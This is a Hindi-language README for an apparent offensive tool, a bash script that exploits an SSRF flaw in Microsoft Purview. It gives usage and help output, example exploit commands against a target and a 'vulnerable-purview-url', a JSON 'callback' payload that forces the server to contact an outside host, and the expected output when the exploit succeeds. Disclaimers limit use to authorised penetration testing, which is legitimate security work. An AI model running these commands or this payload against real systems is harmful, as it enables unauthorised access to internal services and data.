
Microsoft Purview में SSRF भेद्यता
इस रिपॉजिटरी में एक स्क्रिप्ट है जो SSRF (सर्वर-साइड रिक्वेस्ट फोर्जरी) एक्सप्लॉइट करने के लिए डिज़ाइन की गई है, जो परीक्षण और शैक्षिक उद्देश्यों के लिए है। इस उपकरण का जिम्मेदारी से उपयोग करें और केवल उन वातावरणों में जहाँ आपके पास स्पष्ट अनुमति हो।
bash (यूनिक्स शेल)jq (JSON प्रोसेसर)curl (HTTP अनुरोधों के लिए कमांड-लाइन टूल)./script.sh --exploit <target_url> <purview_url>
| विकल्प | विवरण |
|---|---|
-h, --help | सहायता मेनू दिखाएँ। |
--exploit tu pu | लक्ष्य और पुरव्यू URL के साथ SSRF एक्सप्लॉइट करें। |
./script.sh -h
आउटपुट:
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
./script.sh --exploit http://example.com http://purview-url.com
अपेक्षित आउटपुट:
SSRF exploit successful! Data retrieved:
<response data>
SSRF exploit failed! HTTP code: <code>
purview_url पर JSON पेलोड के साथ एक HTTP POST अनुरोध भेजती है, SSRF कमजोरी का शोषण करने का प्रयास करती है।./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
{
"callback": "http://callback-url.com"
}
HTTP प्रतिक्रिया कोड और बॉडी सहेजे जाते हैं, और स्थिति कोड के आधार पर, एक्सप्लॉइट की सफलता या विफलता निर्धारित की जाती है।
यह स्क्रिप्ट केवल परीक्षण उद्देश्यों के लिए है। इस स्क्रिप्ट का दुरुपयोग गंभीर कानूनी परिणामों का कारण बन सकता है। सभी लागू कानूनों और नैतिक मानकों का पालन सुनिश्चित करें।
पुल रिक्वेस्ट बनाकर या समस्याएं रिपोर्ट करके योगदान करने में संकोच न करें।
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। लेखक इस उपकरण के दुरुपयोग या किसी भी क्षति के लिए जिम्मेदार नहीं है।